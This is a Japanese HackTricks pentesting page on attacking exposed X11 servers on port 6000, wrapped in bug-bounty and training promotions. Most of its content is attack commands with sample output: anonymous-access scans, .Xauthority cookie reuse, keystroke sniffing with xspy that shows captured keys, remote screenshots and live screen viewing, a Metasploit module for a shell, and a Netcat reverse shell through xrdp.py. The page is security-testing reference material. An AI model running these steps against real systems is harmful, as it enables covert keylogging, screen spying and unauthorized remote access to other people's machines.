ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert) ! HackenProof Discord
ハッキングの洞察
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界を追いかける
最新の発表
最新のバグバウンティの開始や重要なプラットフォームの更新に関する情報を入手
Discord に参加 して、今日からトップハッカーと協力を始めましょう!
基本情報
X Window System (X)は、UNIXベースのオペレーティングシステムで広く使用されている多目的ウィンドウシステムです。これは、個々のプログラムがユーザーインターフェースデザインを処理する、グラフィカル**ユーザーインターフェース(GUI)**を作成するためのフレームワークを提供します。この柔軟性により、X環境内で多様でカスタマイズ可能な体験が可能となります。
デフォルトポート: 6000
Copy PORT STATE SERVICE
6000/tcp open X11 列挙
匿名接続 をチェックします:
Copy nmap -sV --script x11-access -p < POR T > < I P >
msf> use auxiliary/scanner/x11/open_x11 ローカル列挙
ユーザーのホームフォルダにあるファイル .Xauthority X11の認証に使用 されます。こちら
Copy $ xxd ~/.Xauthority
00000000: 0100 0006 6 d61 6 e65 7063 0001 3000 124 d ............0..M
00000010: 4954 2 d4d 4147 4943 2 d43 4 f4f 4 b49 452 d IT-MAGIC-COOKIE-
00000020: 3100 108 f 52 b9 7 ea8 f041 c49b 85 d8 8 f58 1 ...R.~..A.....X
00000030: 041 d ef ... MIT-magic-cookie-1: 128ビットのキー("cookie")を生成し、~/.Xauthority(またはXAUTHORITY環境変数が指す場所)に保存します。クライアントはそれを平文でサーバーに送信します!サーバーはこの "cookie" のコピーを持っているかどうかを確認し、持っている場合は接続を許可します。キーはDMXによって生成されます。
"cookie"を使用する には、環境変数を設定する必要があります: export XAUTHORITY=/path/to/.Xauthority
ローカル列挙セッション
Copy $ w
23:50:48 up 1 day, 10 :32, 1 user, load average: 0.29 , 6.48 , 7.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13 Oct23 76 days 13 :37 2.20 s xfce4-session 接続の確認
Copy xdpyinfo -display < i p > : < displa y >
xwininfo -root -tree -display < I P > : < displa y > #Ex: xwininfo -root -tree -display 10.5.5.12:0 キーロギング
xspy を使用してキーボードのキーストロークを嗅視します。
サンプル出力:
Copy xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab スクリーンショットのキャプチャ
Copy xwd -root -screen -silent -display < TargetIP: 0> > screenshot.xwd
convert screenshot.xwd screenshot.png リモートデスクトップビュー
方法: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
Way from: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
最初に、xwininfoを使用してウィンドウのIDを見つける必要があります。
Copy xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0 XWatchwin
ライブビューイング を行うには、使用する必要があります
Copy ./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9 .xx.xx:0 -w 0x45 シェルを取得
Copy msf> use exploit/unix/x11/x11_keyboard_exec 他の方法:
リバースシェル: XrdpはNetcatを介してリバースシェルを取得することも可能です。次のコマンドを入力してください:
Copy ./xrdp.py \< IP: 0> –no-disp インターフェースではRシェルオプション が表示されます。
次に、ローカルシステムでポート5555でNetcatリスナー を開始します。
その後、IPアドレスとポートをR-Shell オプションに入力し、R-shell をクリックしてシェルを取得します
参考文献
Shodan
HackenProof Discord
ハッキングの洞察
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界の速いペースについていきましょう
最新の発表
最新のバグバウンティの開始や重要なプラットフォームの更新について情報を得ましょう
Discord
**htARTE (HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学びましょう! 